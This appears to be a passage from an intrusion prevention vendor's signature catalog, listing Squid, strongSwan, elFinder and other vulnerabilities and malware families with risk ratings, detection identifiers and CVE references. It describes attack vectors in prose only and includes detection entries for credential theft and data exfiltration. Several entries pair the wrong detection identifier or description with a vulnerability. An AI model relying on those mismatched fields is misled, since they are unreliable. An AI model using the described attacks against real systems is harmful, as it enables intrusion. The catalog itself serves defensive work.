HTTP_CSH-Squid-Proxy-HTTP-Message-Processing-Buffer-Overread

References:

CVE-2023-49285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49285

Squid-Proxy-HTTP-Request-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Squid

Risk:

Moderate

First detected in:

sgpkg-ips-1223-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Buffer Overflow

Description:

There has been reported a buffer overflow vulnerability in the Squid proxy. This vulnerability can be exploited by sending a crafted request to the server. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRH-Squid-Proxy-HTTP-Request-Processing-Buffer-Overflow

References:

CVE-2020-8450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8450

Squid-Proxy-HTTP-Vary-Header-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-1403-5242

Last changed:

sgpkg-ips-1403-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

Invalid processing of HTTP responses causes a denial of service vulnerability in the Squid proxy.

Situation:

HTTP_SHS-Squid-Proxy-HTTP-Vary-Header-Handling-Denial-Of-Service

References:

CVE-2021-28662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28662

Squid-Proxy-HTTP-X-Forwarded-For-Header-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid

Risk:

High

First detected in:

sgpkg-ips-1723-5242

Last changed:

sgpkg-ips-1723-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in Squid Proxy. The vulnerability is due to improper user input validation when handling X-Forwarded-For headers. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in a denial-of-service condition.

Situation:

HTTP_CSH-Squid-Proxy-HTTP-X-Forwarded-For-Header-Handling-Denial-Of-Service

References:

CVE-2023-50269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50269

Squid-Proxy-Range-Header-DoS

About this vulnerability:

A vulnerability in Squid Proxy Server.

Risk:

High

First detected in:

sgpkg-ips-1424-5242

Last changed:

sgpkg-ips-1424-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

A vulnerability in Squid Proxy Server, versions 3.0-4.1.4 and 5.0.1-5.0.5, which allows remote attackers to cause a denial of service condition by sending requests with specially crafted Range headers, due to the inability to handle malformed ranges, for both CVE-2021-31806 and CVE-2021-31807.

Situation:

HTTP_CSH-Squid-Proxy-Range-Header-DoS

References:

CVE-2021-31806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31806

Squid-Proxy-SNMP-Query-Rejection-Denial-Of-Service

About this vulnerability:	A vulnerability in Squid
Risk:	Moderate
First detected in:	sgpkg-ips-1142-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Squid
Type:	Resource Starvation
Description:	A denial of service vulnerability has been reported in the SNMP component of Squid Proxy. The vulnerability is due to a memory leak in SNMP query rejection code. A remote attacker can exploit this vulnerability by sending a large number of SNMP queries to the target system. Successful exploitation results in the exhaustion of memory, which could lead to denial of service conditions on the target system.
Situation:	SNMP-UDP_Squid-Proxy-SNMP-Query-Rejection-Denial-Of-Service

Squid-Proxy-SSL-Bump-Certificate-Validation-Bypass

About this vulnerability:

A vulnerability in Squid

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

There exists a policy bypass vulnerability in Squid. A remote attacker can use this to for example execute a man-in-the-middle attack.

Situation:

HTTPS_SS-TLS-Certificate-Common-Name-Null-Byte-Input-Validation-Error

References:

CVE-2015-3455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3455

Squid-Proxy-String-Processing-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

High

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

A Denial of Service vulnerability exists in Squid Proxy Cache component. The vulnerability is due to an input validation error while parsing crafted strings sent in a request. The vulnerable code does not validate if a string could be NULL before performing a comparison operation. As a result of this, a NULL pointer dereference occurs that leads to a Denial of Service condition.

Situation:

HTTP_CSH-Squid-Proxy-String-Processing-Null-Pointer-Dereference

References:

BID-42982
http://www.securityfocus.com/bid/42982

Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability

About this vulnerability:

Squid Proxy Unspecified DNS Spoofing Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-679-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Dns Spoof

Description:

A vulnerability exists in Squid 2.5 and earlier that allows remote attackers to spoof DNS lookups if the DNS client port is unfiltered.

Situation:

Generic_UDP-Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability
DNS-UDP_Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability

References:

CVE-2005-1519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1519

BID-13592
http://www.securityfocus.com/bid/13592

Squid-Proxy-Urn-Response-Processing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-1204-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Buffer Overflow

Description:

Improper handling of responses to URN requests causes a heap buffer overflow vulnerability in the Squid proxy. A successful exploit may allow an attacker to execute coed with the privileges of the proxy.

Situation:

File-Text_Squid-Proxy-Urn-Response-Processing-Heap-Buffer-Overflow

References:

CVE-2019-12526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12526

Squid-Range-Header-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in Squid. The vulnerability is due to insufficient validation of range headers. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to an affected server. A successful attack will lead to a denial of service condition.

Situation:

HTTP_CSH-Squid-Range-Header-Denial-Of-Service

References:

CVE-2014-3609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3609

BID-69453
http://www.securityfocus.com/bid/69453

OSVDB-110525
http://www.osvdb.org/110525

Squid-Snmphandleudp-Off-By-One-Buffer-Overflow

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

High

First detected in:

sgpkg-ips-607-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Squid

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in Squid. The vulnerability is due to an off-by-one error resulting in buffer overflow in snmpHandleUdp() function. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to an affected server. A successful attack could lead to arbitrary code execution in the context of the affected application.

Situation:

Datalength-UDP_Long-SNMP-Request

References:

CVE-2014-6270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6270

BID-69686
http://www.securityfocus.com/bid/69686

OSVDB-111286
http://www.osvdb.org/111286

Squid-Squoison-Host-Header-Cache-Poisoning

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

Using mismatched hostnames in different parameters of the same request can cause a cache poisoning in the Squid proxy.

Situation:

HTTP_CS-Squid-Squoison-Host-Header-Cache-Poisoning

References:

CVE-2016-4553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4553

Squid-SSL-Bump-Denial-Of-Service

About this vulnerability:	A vulnerability in Squid Project Squid
Risk:	High
First detected in:	sgpkg-ips-704-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Squid
Type:	Integer Overflow
Description:	There exists a Denial-Of-Service vulnerability in Squid.
Situation:	Generic_CS-Squid-SSL-Bump-Denial-Of-Service HTTPS_CS-Squid-SSL-Bump-Denial-Of-Service HTTPS_SS-Squid-SSL-Bump-Denial-Of-Service

Squid-Strhdracptlanggetitem-Value-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-520-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Infinite Loop

Description:

There is a denial of service vulnerability in the Squid proxy server. The vulnerability is due to an error when generating an error page. This causes an infinite loop. A remote attacker can exploit this vulnerability by sending a specially crafted HTTP request to a vulnerable server (that is displaying an error page). Authentication may or may not be required depending on the server's configuration. Successful exploitation will cause an infinite loop, which may result in a resource exhaustion denial of service.

Situation:

HTTP_CSH-Squid-Strhdracptlanggetitem-Value-Denial-Of-Service

References:

CVE-2013-1839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1839

BID-58316
http://www.securityfocus.com/bid/58316

OSVDB-90910
http://www.osvdb.org/90910

Squid-Strlistgetitem-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

There is a denial of service vulnerability in the way Squid handles HTTP headers. The vulnerability is due to an infinite loop error when processing HTTP headers containing a specific delimiter character. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted HTTP request packets containing malicious HTTP headers. Successful exploitation would consume system resources and may cause the service to terminate.

Situation:

HTTP_CS-Squid-Strlistgetitem-Denial-Of-Service

References:

CVE-2009-2855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2855

BID-36091
http://www.securityfocus.com/bid/36091

Squid-WCCP-Malformed-Message-DoS

About this vulnerability:

Denial of service in Squid WCCP message parsing

Risk:

Low

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Squid

Type:

Malfunction

Description:

Squid Web proxy is vulnerable to a denial of service caused by improper checking of user supplied data in the Web Cache Communication Protocol (WCCP) message parsing. A remote attacker could send a malformed WCCP message and cause a denial of service.

Situation:

Generic_UDP-Squid-WCCP-Malformed-Message-DoS

References:

CVE-2005-0095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0095

BID-12275
http://www.securityfocus.com/bid/12275

OSVDB-12886
http://www.osvdb.org/12886

Squirrelwaffle-Loader-Infection-Traffic

About this vulnerability:	Squirrelwaffle loader traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1393-5242
Last changed:	sgpkg-ips-1393-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Squirrelwaffle loader traffic was detected.
Situation:	HTTP_CS-Squirrelwaffle-Loader-Infection-Traffic

SR10-FTP-Server-Username-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in SR10 FTP Server

Risk:

High

First detected in:

sgpkg-ips-642-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SR10 FTP Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in SR10 FTP Server 1.1.0.6 in Ricoh DC Software DL-10 4.5.0.1, when the Log file name option is enabled. When an oversized username is given with the USER command, a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.

Situation:

SRP_CS-RIM-BlackBerry-Enterprise-Server-Router-Denial-Of-Service

References:

CVE-2012-5002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5002

BID-52235
http://www.securityfocus.com/bid/52235

OSVDB-79691
http://www.osvdb.org/79691

Srizbi-Spambot

About this vulnerability:	Srizbi spambot is a Trojan Horse program used as spamming engine
Risk:	High
First detected in:	sgpkg-ips-269-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Srizbi spambot
Type:	Backdoor
Description:	Srizbi spambot is a Trojan Horse program used as a spamming engine.
Situation:	HTTP_CS-Srizbi-Spambot HTTP_CSU-Srizbi-Activity Generic_CS-Srizbi-Spambot

Srng

About this vulnerability:	SRNG
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SRNG
Type:	Misconfiguration
Description:	SRNG is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Srng HTTP_CSH-Srng

SRP_RIM-BlackBerry-Enterprise-Server-Router-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in RIM Blackberry Enterprise Server Router

Risk:

Low

First detected in:

sgpkg-ips-139-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

The RIM BlackBerry Enterprise Server router component suffers from a denial of service vulnerability where a malformed SRP protocol message is parsed incorrectly.

Situation:

References:

CVE-2005-2342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2342

BID-16100
http://www.securityfocus.com/bid/16100

SSH-Private-Key-File-Transfer

About this vulnerability:	An SSH Private Key file transfer
Risk:	High
First detected in:	sgpkg-ips-1555-5242
Last changed:	sgpkg-ips-1555-5242
Platform:	Any Operating System
Software:	<os>
Type:	Post Compromise Behaviour
Description:	Transfer of an SSH private key over the network was detected.
Situation:	Generic_TCP-SSH-Private-Key-File-Transfer File-Text_SSH-Private-Key-File-Transfer Generic_CS-SSH-Private-Key-File-Transfer

SSH-Version-1.0

About this vulnerability:	SSH version 1.0
Risk:	Moderate
First detected in:	sgpkg-ips-27-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic SSH server
Type:	Malfunction
Description:	SSH version 1.0
Situation:	SSH_Version-1.0

SSL-Certificate-In-Nonstandard-Port

About this vulnerability:	An SSL certificate was detected
Risk:	Low
First detected in:	sgpkg-ips-421-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	An SSL certificate was detected in a nonstandard port
Situation:	Generic_SS-SSL-Certificate-In-Nonstandard-Port TLS_SS-SSL-Certificate-In-Nonstandard-Port

SSL-OpenSSL-Get-Shared-Ciphers-Function-Buffer-Overflow

About this vulnerability:

OpenSSL server vulnerability in SSL_get_shared-ciphers function

Risk:

High

First detected in:

sgpkg-ips-81-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Buffer Overflow

Description:

A vulnerability exists in the OpenSSL server where client hello messages are not parsed correctly. A carefully crafted SSL client hello message can be used to overflow a buffer in the server, potentially allowing arbitrary code execution. The OpenSSL library is used within many applications, and a successful exploit allows arbitrary code execution with the vulnerable application's privileges.

Situation:

HTTPS_CS-OpenSSL-SSLv2-Get-Shared-Ciphers-Function-Buffer-Overflow
HTTPS_CS-OpenSSL-SSLv3-Get-Shared-Ciphers-Function-Buffer-Overflow

References:

CVE-2006-3738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738

BID-20249
http://www.securityfocus.com/bid/20249

OSVDB-29262
http://www.osvdb.org/29262

Ssl-PCT-Buffer-Overflow

About this vulnerability:

Buffer overflow in Microsoft's PCT implementation

Risk:

Critical

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS; Exchange Server

Type:

Buffer Overflow

Description:

Buffer overflow in Microsoft's PCT implementation can be exploited to execute arbitrary commands on the target host with superuser privileges. As the flaw is in Microsoft's SSL library, multiple applications are affected by this vulnerability.

Situation:

Generic_Ssl-PCT-Buffer-Overflow
SMTP_Exchange-Ssl-PCT-Buffer-Overflow
HTTPS_CS-IIS-Ssl-PCT-Buffer-Overflow

References:

CVE-2003-0719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0719

BID-10116
http://www.securityfocus.com/bid/10116

MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011

SSLv3-Library-DoS

About this vulnerability:

Vulnerability in SSL library affects multiple applications

Risk:

Moderate

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

SSL library included in Microsoft Windows can be remotely crashed by sending a specially crafted packet. This affects all applications that use the vulnerable SSL library.

Situation:

HTTPS_CS-IIS-Ssl-Library-Malformed-Client-Hello-DoS
Generic_LDAP-Ssl-Library-Malformed-Client-Hello-DoS
TLS_CS-LDAP-Ssl-Library-Malformed-Client-Hello-DoS

References:

CVE-2004-0120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0120

BID-10115
http://www.securityfocus.com/bid/10115

MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011

SSReader-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in SSReader ActiveX control

Risk:

High

First detected in:

sgpkg-ips-187-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SSReader

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in SSReader ActiveX Control. Superstar SSReader is a electronic book (e-book) application. The ActiveX control included within the reader contains a buffer overflow in a specific method which may allow arbitary code execution in the context of the current user.

Situation:

HTTP_SS-SSReader-ActiveX-Control-Buffer-Overflow
File-Text_SSReader-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-5807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

BID-26247
http://www.securityfocus.com/bid/26247

OSVDB-40230
http://www.osvdb.org/40230

Stagil-Navigation-For-JIRA-Path-Traversal-Vulnerabilities

About this vulnerability:

Multiple vulnerabilities in Stagil Navigation for Jira

Risk:

High

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Generic

Software:

Stagil Navigation for Jira

Type:

Directory Traversal

Description:

Path traversal vulnerabilities CVE-2023-26255 and CVE-2023-26256 have been reported for STAGIL Navigation for Jira. An unauthenticated attacker can use these vulnerabilities to read arbitrary files on the Jira server.

Situation:

HTTP_CRL-Stagil-Navigation-For-JIRA-Path-Traversal-Vulnerabilities

References:

CVE-2023-26255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26255

StalinLocker-Wiper-Binary-File

About this vulnerability:	StalinLocker wiper binary file was detected
Risk:	High
First detected in:	sgpkg-ips-1074-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	StalinLocker (also known as StalinScreamer) is a propagandist wiper. After infection, it gives 6 minutes time window to the user to enter the correct key. If the correct code isn't entered, all drives are wiped.
Situation:	File-Exe_StalinLocker-Wiper-Binary-File

Star-Blizzard-Malicious-Traffic

About this vulnerability:	Traffic generated by Star Blizzard infrastructure
Risk:	High
First detected in:	sgpkg-ips-1678-5242
Last changed:	sgpkg-ips-1678-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Traffic that matches a known Star Blizzard APT pattern has been detected.
Situation:	File-Text_Star-Blizzard-Collect-and-Send-User-Data-POST-Request

StartTLS-Usage

About this vulnerability:	A vulnerability in HP SiteScope
Risk:	Moderate
First detected in:	sgpkg-ips-479-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	StartTLS usage was detected
Situation:	SMTP_StartTLS IMAP_StartTLS POP3_StartTLS

STARWHALE-Malware-C2-Traffic

About this vulnerability:	STARWHALE malware C2 traffic
Risk:	High
First detected in:	sgpkg-ips-1440-5242
Last changed:	sgpkg-ips-1440-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	An HTTP request that matches a known STARWHALE malware command and control traffic pattern was detected.
Situation:	HTTP_CS-STARWHALE-Malware-C2-Traffic File-Text_STARWHALE-Malware-C2-Traffic

StealBit-Malware-Infection-Traffic

About this vulnerability:	StealBit malware infection traffic
Risk:	High
First detected in:	sgpkg-ips-1433-5242
Last changed:	sgpkg-ips-1433-5242
Platform:	Windows; Linux
Software:	<os>
Type:	Backdoor
Description:	StealBit is a malware used for data exfiltration by LockBit ransomware group.
Situation:	HTTP_CS-StealBit-Malware-Infection-Traffic

Stealc-Stealer-Infection-Traffic

About this vulnerability:	Stealc stealer infection traffic
Risk:	High
First detected in:	sgpkg-ips-1560-5242
Last changed:	sgpkg-ips-1560-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	An HTTP request that matches Stealc information stealer command and control traffic patterns was detected. This might indicate that the system from where the traffic originated is compromised.
Situation:	HTTP_CRL-Stealc-Stealer-Infection-Traffic

Stegosploit

About this vulnerability:	Stegosploit
Risk:	Moderate
First detected in:	sgpkg-ips-1125-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Input Validation
Description:	Stegosploit toolkit provides methods for delivering exploits over image files using steganography.
Situation:	File-JPEG_HTML-Inside-JPEG-File File-JPEG_Script-Inside-JPEG-File File-PNG_HTML-Inside-PNG-File File-PNG_Script-Inside-PNG-File

Store-Cgi-Directory-Traversal

About this vulnerability:

ES.One store.cgi directory traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1639-5242

Platform:

Red Hat Linux 7

Software:

ES.One

Type:

Directory Traversal

Description:

The ES.One 1.0 store.cgi script contains an input validation vulnerability that allows the attacker to view any file on the system and list the contents of any directory.

Situation:

Generic_CS-Streamcast-0.9.75-Buffer-Overflow

References:

CVE-2001-0305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0305

BID-2385
http://www.securityfocus.com/bid/2385

Storm-Bot

About this vulnerability:	Storm bot
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Storm is a Windows bot that can be remote controlled. Storm is able to perform various tasks, including a distributed denial of service (DDoS) attacks.
Situation:	HTTP_CSH-Storm-Bot-Activity

Streamcast-0.9.75-Buffer-Overflow

About this vulnerability:

Streamcast 0.9.75 And Earlier Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Streamcast

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Streamcast 0.9.75 and earlier which allows attackers to remotly execute arbitrary code via an overly long User Agent parameter.

Situation:

References:

CVE-2008-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0550

BID-33898
http://www.securityfocus.com/bid/33898

OSVDB-42670
http://www.osvdb.org/42670

StrongSwan-Certificate-And-Identification-Payload-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in strongSwan

Risk:

High

First detected in:

sgpkg-ips-672-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

strongSwan

Type:

Buffer Overflow

Description:

A code execution vulnerability exists on strongSwan. The vulnerability is due to improper use of snprintf() when parsing certificates and Identification Payload. Remote attackers could exploit this vulnerability via a specially crafted certificate or identification payload. Successful exploitation would allow injection and execution of arbitrary code in the context of user root. Unsuccessful code injection attempts would cause termination of the pluto IKE daemon resulting in a denial of service condition.

Situation:

Generic_CS-StrongSwan-Certificate-And-Identification-Payload-Parsing-Buffer-Overflow

References:

CVE-2010-2628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2628

BID-42444
http://www.securityfocus.com/bid/42444

StrongSwan-Gmp-Plugin-Denial-Of-Service

About this vulnerability:

A vulnerability in strongSwan

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

strongSwan

Type:

Input Validation

Description:

There exists a denial-of-service vulnerability in strongSwan.

Situation:

Generic_UDP-StrongSwan-Gmp-Plugin-Denial-Of-Service

References:

CVE-2017-11185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11185

StrongSwan-OpenSSL-Plugin-Fips-Mode-Denial-Of-Service

About this vulnerability:

A vulnerability in strongSwan strongSwan

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

strongSwan

Type:

Malfunction

Description:

A denial-of-service vulnerability has been reported in strongSwan. The vulnerability is due to improper handling of return values from the OpenSSL plugin when used in FIPS mode and non-FIPS approved PRF algorithms are negotiated during IKEv2 key derivation. A remote attacker could exploit this vulnerability by sending a crafted message to a vulnerable server. Successful exploitation of this vulnerability could result in denial-of-service conditions on the target server.

Situation:

Generic_UDP-IKEv2-IKE_Sa_Init-Using-PRF_GMAC_md5
Generic_UDP-StrongSwan-OpenSSL-Plugin-Fips-Mode-Denial-Of-Service

References:

CVE-2018-10811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10811

StrongSwan-Rsassa-Pss-Signature-Denial-Of-Service

About this vulnerability:

A vulnerability in strongSwan strongSwan

Risk:

Moderate

First detected in:

sgpkg-ips-1050-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

strongSwan

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in strongSwan. Incorrect parsing of RSASSA-PSS signatures in certificates could lead to denial-of-service conditions on the target server.

Situation:

Generic_UDP-StrongSwan-Rsassa-Pss-Signature-Denial-Of-Service

References:

CVE-2018-6459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6459

StrongSwan-X509-Plugin-Denial-Of-Service

About this vulnerability:

A vulnerability in strongSwan strongSwan

Risk:

Moderate

First detected in:

sgpkg-ips-958-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

strongSwan

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in strongSwan. The vulnerability is due to improper parsing of various X509 certificate extensions. A remote attacker can send a crafted public key certificate to the target server and cause a denial-of-service condition in the target server.

Situation:

Generic_UDP-StrongSwan-X509-Plugin-Denial-Of-Service

References:

CVE-2017-9023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9023

Studio-42-elFinder-Elfindervolumedriver-Command-Injection

About this vulnerability:

A vulnerability in Studio-42 elFinder

Risk:

High

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Generic

Software:

elFinder

Type:

Input Validation

Description:

A command injection vulnerability has been reported in elFinder. The vulnerability is due to insufficient validation of the file name when creating an archive. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of arbitrary commands with the privileges of the web server process.

Situation:

HTTP_CRL-Studio-42-elFinder-Elfindervolumedriver-Command-Injection

References:

CVE-2021-32682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32682

Studio-42-elFinder-Elfindervolumedriver-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Studio-42 elFinder

Risk:

High

First detected in:

sgpkg-ips-1459-5242

Last changed:

sgpkg-ips-1459-5242

Platform:

Generic

Software:

elFinder

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Studio-42 elFinder. This vulnerability is due to improper input validation on file names when uploading files through the connector.minimal.php endpoint when the software is running on Windows. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file write of an unpermitted type and, in the worst case, remote code execution.

Situation:

HTTP_CS-Studio-42-elFinder-Elfindervolumedriver-Unrestricted-File-Upload

References:

CVE-2022-27115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27115

Studio-42-elFinder-Getfullpath-Directory-Traversal

About this vulnerability:

A vulnerability in Studio-42 elFinder

Risk:

High

First detected in:

sgpkg-ips-1453-5242

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

elFinder

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in elFinder. The vulnerability is due to insufficient validation of user submitted paths. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation can result in disclosure of the content of files outside of the expected document root, or in the worst case, execution of arbitrary code under the security context of the web server process.

Situation:

HTTP_CRL-Studio-42-elFinder-Getfullpath-Directory-Traversal

References:

CVE-2022-26960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26960

Studio-Manager-Denial-of-Service

About this vulnerability:	StudioManager.exe denial of service 0day
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Studio Manager
Type:	Malfunction
Description:	A vulnerability in StudioManager.exe that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation:	Generic_CS-Studio-Manager-Denial-of-Service

Subgraph-Vega-Vulnerability-Scanner-Usage

About this vulnerability:	Parameters associated with Vega Vulnerability scanner
Risk:	Moderate
First detected in:	sgpkg-ips-562-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Subgraph Vega
Type:	Vulnerability Scanner
Description:	Subgraph Vega is an open source web application vulnerability scanner.
Situation:	HTTP_CSU-Subgraph-Vega-Vulnerability-Scanner-Usage

SugarCRM-EmailTemplates-Validation-Vulnerability-CVE-2023-22952

About this vulnerability:

An attempt to exploit a vulnerability in SugarCRM detected

Risk:

High

First detected in:

sgpkg-ips-1584-5242

Last changed:

sgpkg-ips-1584-5242

Platform:

Generic

Software:

SugarCRM

Type:

Input Validation

Description:

